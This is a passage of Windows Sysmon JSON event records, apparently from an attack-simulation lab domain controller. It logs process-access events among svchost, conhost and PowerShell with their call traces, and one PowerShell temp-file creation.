32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5564,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5565,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5566,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5567,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5568,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5569,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001044A90A00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44882483)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","SourceProcessId":"3088","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001044A90A00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF44882483)","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5570,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001044A90A00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001044A90A00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5571,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001044A90A00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001044A90A00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5572,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.453\r\nProcessGuid: {A837DB8D-0330-5F25-0000-001044A90A00}\r\nProcessId: 2540\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xjpdvizb.wx0.ps1\r\nCreationUtcTime: 2020-08-01 05:52:48.453","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 